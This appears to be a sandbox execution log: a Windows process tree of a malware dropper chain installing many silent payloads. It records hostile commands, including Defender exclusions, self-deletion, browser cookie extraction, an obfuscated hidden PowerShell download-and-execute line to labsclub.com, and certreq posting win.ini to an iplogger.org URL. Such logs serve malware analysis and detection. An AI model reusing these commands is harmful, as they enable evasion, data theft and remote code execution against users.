"C:\Users\Admin\AppData\Local\Temp\is-14QQQ.tmp\kkkk.exe" /S /UID=lab214
14⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\AKYAMOCSPU\prolab.exe
"C:\Users\Admin\AppData\Local\Temp\AKYAMOCSPU\prolab.exe" /VERYSILENT
15⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\is-HKQQE.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HKQQE.tmp\prolab.tmp" /SL5="$80250,575243,216576,C:\Users\Admin\AppData\Local\Temp\AKYAMOCSPU\prolab.exe" /VERYSILENT
16⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\9c-a4762-a71-16db1-c00245aa03f64\Vewushaehaeshu.exe
"C:\Users\Admin\AppData\Local\Temp\9c-a4762-a71-16db1-c00245aa03f64\Vewushaehaeshu.exe"
15⤵
PID:6400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i3hf3qjb.bpl\GcleanerWW.exe /mixone & exit
16⤵
PID:5160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe & exit
16⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
17⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\nr5eu10r.5ur\privacytools5.exe
18⤵
PID:5464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\retpzulk.2bx\setup.exe /8-2222 & exit
16⤵
PID:4068

C:\Users\Admin\AppData\Local\Temp\retpzulk.2bx\setup.exe
C:\Users\Admin\AppData\Local\Temp\retpzulk.2bx\setup.exe /8-2222
17⤵
PID:4280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dawn-Morning"
18⤵
PID:5220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nplyswpy.0uh\MultitimerFour.exe & exit
16⤵
PID:5824

C:\Users\Admin\AppData\Local\Temp\nplyswpy.0uh\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\nplyswpy.0uh\MultitimerFour.exe
17⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
18⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe" 1 3.1615014732.60432b4cf3ff4 104
19⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\BLJHUIJRJ2\multitimer.exe" 2 3.1615014732.60432b4cf3ff4
20⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\q3hw4hryqux\vict.exe
"C:\Users\Admin\AppData\Local\Temp\q3hw4hryqux\vict.exe" /VERYSILENT /id=535
21⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\is-I7U3F.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I7U3F.tmp\vict.tmp" /SL5="$602CE,870426,780800,C:\Users\Admin\AppData\Local\Temp\q3hw4hryqux\vict.exe" /VERYSILENT /id=535
22⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\is-PAEJG.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-PAEJG.tmp\wimapi.exe" 535
23⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\y0hz5n3lfsa\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\y0hz5n3lfsa\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:5556

C:\Users\Admin\AppData\Local\Temp\is-2JIVQ.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2JIVQ.tmp\Setup3310.tmp" /SL5="$70342,802346,56832,C:\Users\Admin\AppData\Local\Temp\y0hz5n3lfsa\Setup3310.exe" /Verysilent /subid=577
22⤵
PID:5268

C:\Users\Admin\AppData\Local\Temp\is-K3OCE.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-K3OCE.tmp\Setup.exe" /Verysilent
23⤵
PID:6196

C:\Users\Admin\AppData\Local\Temp\is-HU85G.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HU85G.tmp\Setup.tmp" /SL5="$D024A,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-K3OCE.tmp\Setup.exe" /Verysilent
24⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\ProPlugin.exe" /Verysilent
25⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\is-F8L82.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F8L82.tmp\ProPlugin.tmp" /SL5="$105AC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\ProPlugin.exe" /Verysilent
26⤵
PID:6184

C:\Users\Admin\AppData\Local\Temp\is-84JEG.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-84JEG.tmp\Setup.exe"
27⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"
28⤵
PID:6480

C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\PictureLAb.exe" /Verysilent
25⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\is-PQ85M.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PQ85M.tmp\PictureLAb.tmp" /SL5="$205AC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\PictureLAb.exe" /Verysilent
26⤵
PID:7000

C:\Users\Admin\AppData\Local\Temp\is-JVKK9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JVKK9.tmp\Setup.exe" /VERYSILENT
27⤵
PID:6800

C:\Users\Admin\AppData\Local\Temp\is-JN24M.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JN24M.tmp\Setup.tmp" /SL5="$30606,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-JVKK9.tmp\Setup.exe" /VERYSILENT
28⤵
PID:2768

C:\Users\Admin\AppData\Local\Temp\is-A6BQD.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-A6BQD.tmp\kkkk.exe" /S /UID=lab214
29⤵
PID:7092

C:\Users\Admin\AppData\Local\Temp\e2-7e660-d62-0e1af-53344f5d5b641\Bexutybaera.exe
"C:\Users\Admin\AppData\Local\Temp\e2-7e660-d62-0e1af-53344f5d5b641\Bexutybaera.exe"
30⤵
PID:4480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hq4twmn.hb1\GcleanerWW.exe /mixone & exit
31⤵
PID:9660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe & exit
31⤵
PID:10048

C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
32⤵
PID:4708

C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\mag145n4.vxm\privacytools5.exe
33⤵
PID:10780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sh454xlv.rmo\setup.exe /8-2222 & exit
31⤵
PID:8796

C:\Users\Admin\AppData\Local\Temp\sh454xlv.rmo\setup.exe
C:\Users\Admin\AppData\Local\Temp\sh454xlv.rmo\setup.exe /8-2222
32⤵
PID:10428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Nameless-Glade"
33⤵
PID:10596

C:\Program Files (x86)\Nameless-Glade\7za.exe
"C:\Program Files (x86)\Nameless-Glade\7za.exe" e -p154.61.71.51 winamp-plugins.7z
33⤵
PID:8328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gwi1ebbx.g11\MultitimerFour.exe & exit
31⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\gwi1ebbx.g11\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\gwi1ebbx.g11\MultitimerFour.exe
32⤵
PID:10504

C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
33⤵
PID:11148

C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe" 1 3.1615014842.60432bba8f0e2 104
34⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8491UAYCP5\multitimer.exe" 2 3.1615014842.60432bba8f0e2
35⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\b1unxf3ujxu\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\b1unxf3ujxu\safebits.exe" /S /pubid=1 /subid=451
36⤵
PID:8912

C:\Users\Admin\AppData\Local\Temp\1k1mylzensw\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\1k1mylzensw\askinstall24.exe"
36⤵
PID:8928

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
37⤵
PID:9476

C:\Users\Admin\AppData\Local\Temp\teecelwmiv5\vict.exe
"C:\Users\Admin\AppData\Local\Temp\teecelwmiv5\vict.exe" /VERYSILENT /id=535
36⤵
PID:8920

C:\Users\Admin\AppData\Local\Temp\is-B96BT.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B96BT.tmp\vict.tmp" /SL5="$A05D4,870426,780800,C:\Users\Admin\AppData\Local\Temp\teecelwmiv5\vict.exe" /VERYSILENT /id=535
37⤵
PID:9152

C:\Users\Admin\AppData\Local\Temp\is-GBM2B.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-GBM2B.tmp\wimapi.exe" 535
38⤵
PID:9564

C:\Users\Admin\AppData\Local\Temp\tfkko3lza10\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\tfkko3lza10\Setup3310.exe" /Verysilent /subid=577
36⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\is-TFA1G.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TFA1G.tmp\Setup3310.tmp" /SL5="$40636,802346,56832,C:\Users\Admin\AppData\Local\Temp\tfkko3lza10\Setup3310.exe" /Verysilent /subid=577
37⤵
PID:9140

C:\Users\Admin\AppData\Local\Temp\2nxh3njplb4\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\2nxh3njplb4\chashepro3.exe" /VERYSILENT
36⤵
PID:9088

C:\Users\Admin\AppData\Local\Temp\is-AEMSP.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AEMSP.tmp\chashepro3.tmp" /SL5="$501FE,2015144,58368,C:\Users\Admin\AppData\Local\Temp\2nxh3njplb4\chashepro3.exe" /VERYSILENT
37⤵
PID:9172

C:\Users\Admin\AppData\Local\Temp\antyy1a0aas\blhs03mm0gs.exe
"C:\Users\Admin\AppData\Local\Temp\antyy1a0aas\blhs03mm0gs.exe" /ustwo INSTALL
36⤵
PID:9080

C:\Users\Admin\AppData\Local\Temp\st5eltxq4cu\app.exe
"C:\Users\Admin\AppData\Local\Temp\st5eltxq4cu\app.exe" /8-23
36⤵
PID:9576

C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\Delta.exe" /Verysilent
25⤵
PID:6792

C:\Users\Admin\AppData\Local\Temp\is-DMFCH.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DMFCH.tmp\Delta.tmp" /SL5="$40606,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\Delta.exe" /Verysilent
26⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\is-0BE1C.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-0BE1C.tmp\Setup.exe" /VERYSILENT
27⤵
PID:9872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-0BE1C.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
28⤵
PID:6516

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
29⤵
- Kills process with taskkill
PID:11156

C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\zznote.exe" /Verysilent
25⤵
PID:10072

C:\Users\Admin\AppData\Local\Temp\is-RHV1C.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RHV1C.tmp\zznote.tmp" /SL5="$405AC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\zznote.exe" /Verysilent
26⤵
PID:10144

C:\Users\Admin\AppData\Local\Temp\is-HBIN0.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-HBIN0.tmp\jg4_4jaa.exe" /silent
27⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-D59SG.tmp\hjjgaa.exe" /Verysilent
25⤵
PID:10604

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
26⤵
PID:11044

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
26⤵
PID:10784

C:\Users\Admin\AppData\Local\Temp\2jzkrcqwf2a\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\2jzkrcqwf2a\safebits.exe" /S /pubid=1 /subid=451
21⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\czgw54vlzkk\a531j3uggm3.exe
"C:\Users\Admin\AppData\Local\Temp\czgw54vlzkk\a531j3uggm3.exe" /ustwo INSTALL
21⤵
PID:6572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 656
22⤵
- Program crash
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 668
22⤵
- Program crash
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 672
22⤵
- Program crash
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 820
22⤵
- Program crash
PID:6220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 896
22⤵
- Program crash
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 936
22⤵
- Program crash
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 1088
22⤵
- Program crash
PID:4928

C:\Users\Admin\AppData\Local\Temp\0rcvq0dm54k\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\0rcvq0dm54k\askinstall24.exe"
21⤵
PID:5444

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
22⤵
PID:6276

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
23⤵
- Kills process with taskkill
PID:3472

C:\Users\Admin\AppData\Local\Temp\wqvri2e3kwd\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\wqvri2e3kwd\vpn.exe" /silent /subid=482
21⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\is-5TGRL.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5TGRL.tmp\vpn.tmp" /SL5="$703FE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wqvri2e3kwd\vpn.exe" /silent /subid=482
22⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\mxwtmnp4img\app.exe
"C:\Users\Admin\AppData\Local\Temp\mxwtmnp4img\app.exe" /8-23
21⤵
PID:4320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Autumn-Flower"
22⤵
PID:4700

C:\Program Files (x86)\Autumn-Flower\7za.exe
"C:\Program Files (x86)\Autumn-Flower\7za.exe" e -p154.61.71.51 winamp-plugins.7z
22⤵
PID:4244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Autumn-Flower\app.exe" -map "C:\Program Files (x86)\Autumn-Flower\WinmonProcessMonitor.sys""
22⤵
PID:1328

C:\Program Files (x86)\Autumn-Flower\app.exe
"C:\Program Files (x86)\Autumn-Flower\app.exe" -map "C:\Program Files (x86)\Autumn-Flower\WinmonProcessMonitor.sys"
23⤵
PID:4816

C:\Program Files (x86)\Autumn-Flower\7za.exe
"C:\Program Files (x86)\Autumn-Flower\7za.exe" e -p154.61.71.51 winamp.7z
22⤵
PID:5988

C:\Program Files (x86)\Autumn-Flower\app.exe
"C:\Program Files (x86)\Autumn-Flower\app.exe" /8-23
22⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\chp33zwu2sk\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\chp33zwu2sk\chashepro3.exe" /VERYSILENT
21⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\is-HAJSG.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HAJSG.tmp\chashepro3.tmp" /SL5="$7020C,2015144,58368,C:\Users\Admin\AppData\Local\Temp\chp33zwu2sk\chashepro3.exe" /VERYSILENT
22⤵
PID:4776

C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\Delta.exe" /Verysilent
10⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\is-A0TDL.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A0TDL.tmp\Delta.tmp" /SL5="$3054E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\Delta.exe" /Verysilent
11⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\is-Q8QPS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q8QPS.tmp\Setup.exe" /VERYSILENT
12⤵
PID:6660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-Q8QPS.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
13⤵
PID:5900

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
14⤵
- Kills process with taskkill
PID:6872

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
14⤵
- Delays execution with timeout.exe
PID:4936

C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\zznote.exe" /Verysilent
10⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\is-JSJHR.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JSJHR.tmp\zznote.tmp" /SL5="$8024A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\zznote.exe" /Verysilent
11⤵
PID:4532

C:\Users\Admin\AppData\Local\Temp\is-UP0KN.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-UP0KN.tmp\jg4_4jaa.exe" /silent
12⤵
PID:7016

C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\hjjgaa.exe" /Verysilent
10⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\di5n0uxkael\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\di5n0uxkael\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
6⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\is-HL321.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HL321.tmp\IBInstaller_97039.tmp" /SL5="$3026A,14452723,721408,C:\Users\Admin\AppData\Local\Temp\di5n0uxkael\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
7⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\is-SGB4P.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-SGB4P.tmp\{app}\chrome_proxy.exe"
8⤵
PID:5408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-SGB4P.tmp\{app}\chrome_proxy.exe"
9⤵
PID:4920

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
10⤵
- Runs ping.exe
PID:1512

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
8⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\1hhka2x1t4a\vict.exe
"C:\Users\Admin\AppData\Local\Temp\1hhka2x1t4a\vict.exe" /VERYSILENT /id=535
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4560

C:\Users\Admin\AppData\Local\Temp\is-OUNC4.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OUNC4.tmp\vict.tmp" /SL5="$1025C,870426,780800,C:\Users\Admin\AppData\Local\Temp\1hhka2x1t4a\vict.exe" /VERYSILENT /id=535
7⤵
PID:4752

C:\Users\Admin\AppData\Local\Temp\is-55CAN.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-55CAN.tmp\wimapi.exe" 535
8⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\t3v3J58Id.exe
"C:\Users\Admin\AppData\Local\Temp\t3v3J58Id.exe"
9⤵
PID:6528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im t3v3J58Id.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\t3v3J58Id.exe" & del C:\ProgramData\*.dll & exit
10⤵
PID:5768

C:\Windows\SysWOW64\taskkill.exe
taskkill /im t3v3J58Id.exe /f
11⤵
- Kills process with taskkill
PID:6852

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
11⤵
- Delays execution with timeout.exe
PID:1232

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
9⤵
PID:5920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
10⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\qolc0vl4cj1\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\qolc0vl4cj1\safebits.exe" /S /pubid=1 /subid=451
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4376

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\qolc0vl4cj1\safebits.exe
7⤵
PID:2112

C:\Users\Admin\AppData\Local\Temp\21a0yj4ifpf\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\21a0yj4ifpf\vpn.exe" /silent /subid=482
6⤵
PID:5052

C:\Users\Admin\AppData\Local\Temp\is-8SI3V.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8SI3V.tmp\vpn.tmp" /SL5="$1031E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\21a0yj4ifpf\vpn.exe" /silent /subid=482
7⤵
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
8⤵
PID:1676

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
9⤵
PID:3796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
8⤵
PID:6752

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
9⤵
PID:7108

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
8⤵
PID:3880

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
8⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\dqz352xuu3o\coebriwznk5.exe
"C:\Users\Admin\AppData\Local\Temp\dqz352xuu3o\coebriwznk5.exe" testparams
6⤵
PID:4204

C:\Users\Admin\AppData\Roaming\nteuxk31i0a\jnlf2jny3ys.exe
"C:\Users\Admin\AppData\Roaming\nteuxk31i0a\jnlf2jny3ys.exe" /VERYSILENT /p=testparams
7⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\is-550II.tmp\jnlf2jny3ys.tmp
"C:\Users\Admin\AppData\Local\Temp\is-550II.tmp\jnlf2jny3ys.tmp" /SL5="$302BC,404973,58368,C:\Users\Admin\AppData\Roaming\nteuxk31i0a\jnlf2jny3ys.exe" /VERYSILENT /p=testparams
8⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\fhkv13vihny\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\fhkv13vihny\chashepro3.exe" /VERYSILENT
6⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\is-3H76H.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3H76H.tmp\chashepro3.tmp" /SL5="$102C2,2015144,58368,C:\Users\Admin\AppData\Local\Temp\fhkv13vihny\chashepro3.exe" /VERYSILENT
7⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
8⤵
PID:2756

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
9⤵
PID:5860

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
8⤵
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
8⤵
PID:4372

